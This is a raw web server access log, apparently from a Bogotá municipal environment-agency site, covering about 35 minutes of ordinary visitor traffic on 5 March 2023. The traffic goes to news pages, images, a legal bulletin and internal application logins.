181.53.13.142 - - [05/Mar/2023:08:19:24 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Qt2KpONucPO7SGaEEeA5x890ZpOJgnAxPdPreX8tFLxRJpksmTpu6bN0/dP1fJXM9licetQUUCKnHnjN1D/jhKsTh8uCH2ky5ux5Z8lmebnTgUqVv7qb9HPeaxzhrTaQnE5Bgbh4xI6z6zI6wlEp6aiWw2l31khVa+57ldPIQo/mUiJuqCCvyraH7jfgGRBaNzqNJbknP9b5hcan0Ddk8IhyFXNxAxmZcLGkxMdsNT9omCCY7rGCO9kuv54AU8zw5Dhj1XRjZko5D8ANTESsYUhYFWekFQHljNxMVUjxbAU5bencwGjlk+XwoQoZXtBv27pGgGFksn1/KfLiiYEKB8Nic9AUA8NN9rW+Ou4iNT2XrzYjZqij/wBqLYOiRhyWLspAbwscaS3J+FjNOBhJd+/ujjBQsTRFeCr3JuuNMJz22uPmiJUv96Rqdc1Auj1KeOk/4N3byr+oqk3yLn4rtckZLwYBAW1EGAYaOTVkn1SKuyELMt2BuNV2AGvLh95VK4mwdz1PsiqBYE5qSzu7lw/a+x4vyDtTyy+jcTt2hiL+LkW3hI7aLRai6JDvYnNWRR7FbfwGLqsZqz8IowjUXd74haZPZANUiU1tzs4OUbYpD3wjdus5E+CuAG0ZH9JynE2BhLEiJ1Ce8xXvO0OeXQnjs7mGt9jv9dDs0RnBjAOe9ezcnivdqKEhI84r5nR6zUgy6WM2cbQcdNGU5vAtNnDgvtyBb5Hx9Am3jN042Q0qHkwUkzFhGEoN7RR2Ptbi9FK6vl6Kq97QlmDp4xwekwJaAf6u15mnKXzObS0k7ywmqtlMUfYBct/QwQWoEZxFV8kGseAlLdWF5e5TSAshKO/Y9JPGCpE8W9W35lRz8KORIcUTgu3+Mbi4vd8EIbSuZEBNUIr2ybCsCYgsV509Z8UwGmANCQ/XB+5NHnquU/nsRYlfzgtsYde2fO+v4gtaLmmmQvf6KmR2O02Lfcr8ae42nM1jUMO7o5913hBziuZXXoN5iVBiQsOSw8jgFVvr8PcBZZVcOERiLA/DeihSRVJR7S3aPBF2niqvTzxyy3IF8QSYHp96slv5EZJNZqdS80oNVQkWVZeA/Rm+18Wi6QwDBI229q/xU44mjikYJ+Q71JqtwwXCRLU5kyYxB1dRbLVbLPJIYSrmP9rIp9ugaql3CGd9e6p59A3uZJnEZZJp0EP9fPdbR5XleNGKJbpnZUwKctkwz9USXA4YOqLmLwgOnmMVBX4rKAc4XjrE8WBEXt/1YyJu8yUJ132nh+Q4SHNUEmp9K9OHfMpMq4Pc7Tm9wbmzO+SweZ0h5PIp0XOnZcCh5x6LDKXJlx3xUkW4uF/Xtb+7KczMPAiy2uWjXhIBkfuJlnnsg/6pCS5BU4Onwvcn+FY4GcST3pZ4afHoCQI9CQjOTASSZxXesnctE18CcBFVkTMETSHg+7XjaMGgthQZSqi1l72ru9cBBiGselxQ0dCGEj2ge0gRVp6MmUuzT02M+fSHk5om0awwgOjIqk/POpvbDN5rkNZZRnUfZIiL5bl98IqTRa0hutbMIMZnB5hnQ+/QJbZMtr7nESCTt06Js2sd83Vxg0K/Df4JTq0v++kPCYkjPDciqYDRkLQYKV9z888kRJo84rrxeM0qhMVSuszjUfmG2ZoA1ORgzKd3QBnsmib6Rh1SjmdujiU4NRQZusjtGv1fn6Q+ipwWOd7TyZs1JhCq8H6eDpp7nAfo6LzFbj4D6x7qr/190HGAMt48fDRX538WkZef0u9ll+d1++qrwQuq860RHlnlAefef72h1xl/1OqzZ+DUAJm7Q4BK0eA27xpB/X3uwFP32vllG3rdx6bbgwRd+pkCwCg2OtbvDcA==&u=U2FsdGVkX1/FUbhyb4PflAZEILXp+pDPaTeGNXjbWS/FWARt7D2XcfFCFfpUQ4Nh&y=U2FsdGVkX1+qBnX6/1p3M9iJNf8d1w29w0NyKQIAKBe0v+/DicTvN/YYP1u6jQNa HTTP/1.1" 200 26
181.53.13.142 - - [05/Mar/2023:08:19:24 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+P2uTmC8BeDySC+p+hWnJ/nv+ds3UYJx6Swb3nrVtCakOkjkhqR3LpC1l5A8Xcl6OiY9RnmieRgC7yFLlxMi4eI38+XbFoAPiJQIlqAjCpc5oI2puwNDkjg3LpJEIlslw/fssS5a0m1q6aSDUgHSwSn94t8HGTEno=&u=U2FsdGVkX1/FUbhyb4PflAZEILXp+pDPaTeGNXjbWS/FWARt7D2XcfFCFfpUQ4Nh&y=U2FsdGVkX1+qBnX6/1p3M9iJNf8d1w29w0NyKQIAKBe0v+/DicTvN/YYP1u6jQNa HTTP/1.1" 200 26
181.53.13.142 - - [05/Mar/2023:08:19:24 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/ZahURiMRlteYwkPXTN9uGNZwobjXVGEAztSoFEVhj8rHzQjMNZrX8xhhIhjMpOnm/3YpFtohHx8RhXjWuNSMFANu78FZ/v6rweqXtH/L9aaMgRjlWFDXoMw9WebT9DXQSqVPSIOq0cx5iLeveo3bjprFUMYtLE8Q=&u=U2FsdGVkX1/FUbhyb4PflAZEILXp+pDPaTeGNXjbWS/FWARt7D2XcfFCFfpUQ4Nh&y=U2FsdGVkX1+qBnX6/1p3M9iJNf8d1w29w0NyKQIAKBe0v+/DicTvN/YYP1u6jQNa HTTP/1.1" 200 26
181.53.13.142 - - [05/Mar/2023:08:19:24 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19KuGP6kZ9rQ0Harw9SAbhvTSzx6ddZYL24sW5IrdZGV0kcHTvY5KUXCGY8R9pL2q9XHHdxjFJqTG1Oti2/7mtS/L5+ZaJ2HvdjAjHuwKQUWdGUavTJ7b9xZAhcmRpib26YizRzGRLivuTbfrmpmbfFeS7S0rCpVyw=&u=U2FsdGVkX1/FUbhyb4PflAZEILXp+pDPaTeGNXjbWS/FWARt7D2XcfFCFfpUQ4Nh&y=U2FsdGVkX1+qBnX6/1p3M9iJNf8d1w29w0NyKQIAKBe0v+/DicTvN/YYP1u6jQNa HTTP/1.1" 200 26
181.53.13.142 - - [05/Mar/2023:08:19:25 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX183hh/Rdqc7Fh33qFbRX/Rn7pTekCvx1iGgBLWHBPfE7BpXvt8zyi+M1mK/8AlrEeMYLTQCKOWPPGEn+8XVCBRd6xH/Cj/yMvba+f65OTegC3Ovv2VzsKXAvn6aKfl/uePmcGU/dKuxjE7D1+AtAWwwNNkbrO4dbhlODfPwYcSFrtB30COs2jHyNWJ0ELAqZAAgh5iHSYQmpA==&u=U2FsdGVkX1/FUbhyb4PflAZEILXp+pDPaTeGNXjbWS/FWARt7D2XcfFCFfpUQ4Nh&y=U2FsdGVkX1+qBnX6/1p3M9iJNf8d1w29w0NyKQIAKBe0v+/DicTvN/YYP1u6jQNa HTTP/1.1" 200 26
216.245.221.92 - - [05/Mar/2023:08:20:44 -0500] "HEAD / HTTP/1.1" 200 -
186.144.234.40 - - [05/Mar/2023:08:20:47 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 200 924
201.245.192.253 - - [05/Mar/2023:08:21:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
185.119.81.97 - - [05/Mar/2023:08:22:01 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [05/Mar/2023:08:22:02 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [05/Mar/2023:08:22:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.87.14 - - [05/Mar/2023:08:24:14 -0500] "GET /images/24%20de%20febrero%20Sendero%20guadalupe%202.jpeg HTTP/1.1" 200 70964
172.22.2.4 - - [05/Mar/2023:08:23:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
40.77.167.251 - - [05/Mar/2023:08:25:00 -0500] "GET /secretaria-de-ambiente-impone-sancion-por-puntos-de-obra-sin-permiso-en-el-humedal-tibabuyes.html HTTP/1.1" 200 990
216.245.221.92 - - [05/Mar/2023:08:25:44 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Mar/2023:08:26:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
201.245.192.253 - - [05/Mar/2023:08:27:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40696
201.245.192.253 - - [05/Mar/2023:08:27:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42557
152.203.147.91 - - [05/Mar/2023:08:27:56 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
152.203.147.91 - - [05/Mar/2023:08:27:58 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.147.91 - - [05/Mar/2023:08:27:58 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12167
152.203.147.91 - - [05/Mar/2023:08:27:58 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
152.203.147.91 - - [05/Mar/2023:08:27:58 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
152.203.147.91 - - [05/Mar/2023:08:27:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.147.91 - - [05/Mar/2023:08:27:58 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
152.203.147.91 - - [05/Mar/2023:08:27:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.147.91 - - [05/Mar/2023:08:27:58 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
152.203.147.91 - - [05/Mar/2023:08:27:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.147.91 - - [05/Mar/2023:08:27:58 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
152.203.147.91 - - [05/Mar/2023:08:27:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
152.203.147.91 - - [05/Mar/2023:08:27:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
152.203.147.91 - - [05/Mar/2023:08:27:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
152.203.147.91 - - [05/Mar/2023:08:28:02 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
152.203.147.91 - - [05/Mar/2023:08:28:02 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
152.203.147.91 - - [05/Mar/2023:08:28:02 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:16 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2217
191.95.31.57 - - [05/Mar/2023:08:28:16 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:16 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2217
191.95.31.57 - - [05/Mar/2023:08:28:16 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2217
152.203.147.91 - - [05/Mar/2023:08:28:16 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 400 1022
191.95.31.57 - - [05/Mar/2023:08:28:19 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16287
191.95.31.57 - - [05/Mar/2023:08:28:20 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
191.95.31.57 - - [05/Mar/2023:08:28:20 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:20 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
191.95.31.57 - - [05/Mar/2023:08:28:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:21 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
191.95.31.57 - - [05/Mar/2023:08:28:21 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
191.95.31.57 - - [05/Mar/2023:08:28:21 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
191.95.31.57 - - [05/Mar/2023:08:28:25 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:25 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
191.95.31.57 - - [05/Mar/2023:08:28:27 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 65290
191.95.31.57 - - [05/Mar/2023:08:28:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:28 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:28:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
191.95.31.57 - - [05/Mar/2023:08:28:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 34807
191.95.31.57 - - [05/Mar/2023:08:28:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 34807
191.95.31.57 - - [05/Mar/2023:08:28:44 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 35063
191.95.31.57 - - [05/Mar/2023:08:28:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 16879
191.95.31.57 - - [05/Mar/2023:08:28:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 7821
191.95.31.57 - - [05/Mar/2023:08:28:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 35063
191.95.31.57 - - [05/Mar/2023:08:28:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 34807
191.95.31.57 - - [05/Mar/2023:08:28:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 34338
191.95.31.57 - - [05/Mar/2023:08:28:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31716
191.95.31.57 - - [05/Mar/2023:08:28:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 7693
191.95.31.57 - - [05/Mar/2023:08:29:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31712
191.95.31.57 - - [05/Mar/2023:08:29:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 7705
191.95.31.57 - - [05/Mar/2023:08:29:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31716
191.95.31.57 - - [05/Mar/2023:08:29:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 7748
191.95.31.57 - - [05/Mar/2023:08:29:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 145825
191.95.31.57 - - [05/Mar/2023:08:29:26 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:29:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:29:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:29:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:29:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:29:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:29:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:29:32 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:29:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:29:31 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 48863
191.95.31.57 - - [05/Mar/2023:08:29:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:29:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:29:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:29:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.31.57 - - [05/Mar/2023:08:29:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [05/Mar/2023:08:28:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.95.3 - - [05/Mar/2023:08:30:03 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
152.203.191.203 - - [05/Mar/2023:08:30:23 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 200 924
172.22.2.4 - - [05/Mar/2023:08:29:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [05/Mar/2023:08:30:44 -0500] "HEAD / HTTP/1.1" 200 -
186.28.82.45 - - [05/Mar/2023:08:30:45 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 200 924
201.245.192.253 - - [05/Mar/2023:08:31:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
173.252.127.119 - - [05/Mar/2023:08:33:49 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
31.13.115.11 - - [05/Mar/2023:08:34:48 -0500] "GET /images/idpyba-4-marzo-1_optimized.jpeg HTTP/1.1" 200 115318
172.22.2.4 - - [05/Mar/2023:08:34:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Mar/2023:08:35:44 -0500] "HEAD / HTTP/1.1" 200 -
173.252.111.1 - - [05/Mar/2023:08:36:17 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [05/Mar/2023:08:34:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
172.22.2.4 - - [05/Mar/2023:08:36:40 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [05/Mar/2023:08:36:41 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
161.18.164.76 - - [05/Mar/2023:08:36:43 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
161.18.164.76 - - [05/Mar/2023:08:36:50 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 579767
69.63.184.5 - - [05/Mar/2023:08:36:52 -0500] "GET /images/idpyba-4-marzo-1_optimized.jpeg HTTP/1.1" 200 115318
201.245.192.253 - - [05/Mar/2023:08:36:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
69.171.249.118 - - [05/Mar/2023:08:36:58 -0500] "GET /images/Acuerdos%2001%20(1)%20(1).jpeg HTTP/1.1" 200 32884
172.22.2.4 - - [05/Mar/2023:08:36:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [05/Mar/2023:08:37:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40696
201.245.192.253 - - [05/Mar/2023:08:37:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42557
216.245.221.92 - - [05/Mar/2023:08:40:44 -0500] "HEAD / HTTP/1.1" 200 -
173.252.127.8 - - [05/Mar/2023:08:40:57 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [05/Mar/2023:08:41:02 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
52.167.144.67 - - [05/Mar/2023:08:41:08 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12489
172.22.2.4 - - [05/Mar/2023:08:39:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
179.19.35.100 - - [05/Mar/2023:08:41:44 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 200 924
201.245.192.253 - - [05/Mar/2023:08:41:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
172.22.2.4 - - [05/Mar/2023:08:40:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
181.54.55.86 - - [05/Mar/2023:08:43:56 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.54.55.86 - - [05/Mar/2023:08:43:57 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.54.55.86 - - [05/Mar/2023:08:43:57 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.54.55.86 - - [05/Mar/2023:08:43:57 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
181.54.55.86 - - [05/Mar/2023:08:43:57 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
181.54.55.86 - - [05/Mar/2023:08:43:57 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
173.252.83.24 - - [05/Mar/2023:08:44:01 -0500] "GET /images/20%20de%20febrero%20panor\xc3\xa1mica%20de%20Bogot\xc3\xa1%20(1)%20(1).jpeg HTTP/1.1" 404 1034
181.54.55.86 - - [05/Mar/2023:08:44:13 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
181.54.55.86 - - [05/Mar/2023:08:44:15 -0500] "POST /appsia/controlador HTTP/1.1" 200 39430
181.54.55.86 - - [05/Mar/2023:08:44:16 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
52.167.144.47 - - [05/Mar/2023:08:44:47 -0500] "GET /forest/ HTTP/1.1" 200 12041
216.245.221.92 - - [05/Mar/2023:08:45:44 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Mar/2023:08:46:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
172.22.2.4 - - [05/Mar/2023:08:45:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.220.149.14 - - [05/Mar/2023:08:47:22 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [05/Mar/2023:08:46:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
172.22.2.4 - - [05/Mar/2023:08:48:34 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-746-12.docx HTTP/1.1" 200 22637
172.22.2.4 - - [05/Mar/2023:08:48:34 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
173.252.87.119 - - [05/Mar/2023:08:49:28 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
216.245.221.92 - - [05/Mar/2023:08:50:44 -0500] "HEAD / HTTP/1.1" 200 -
186.84.88.229 - - [05/Mar/2023:08:50:44 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 200 924
173.252.111.17 - - [05/Mar/2023:08:51:22 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
201.245.192.253 - - [05/Mar/2023:08:51:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40529
172.22.2.4 - - [05/Mar/2023:08:51:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.155.73.115 - - [05/Mar/2023:08:53:26 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.155.73.115 - - [05/Mar/2023:08:53:27 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
186.155.73.115 - - [05/Mar/2023:08:53:27 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
186.155.73.115 - - [05/Mar/2023:08:53:27 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
186.155.73.115 - - [05/Mar/2023:08:53:27 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
186.155.73.115 - - [05/Mar/2023:08:53:27 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.155.73.115 - - [05/Mar/2023:08:53:40 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
186.155.73.115 - - [05/Mar/2023:08:53:42 -0500] "POST /appsia/controlador HTTP/1.1" 200 7729
186.155.73.115 - - [05/Mar/2023:08:53:43 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
186.29.1.84 - - [05/Mar/2023:08:53:51 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 200 924
172.22.2.4 - - [05/Mar/2023:08:52:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
172.22.2.4 - - [05/Mar/2023:08:54:56 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
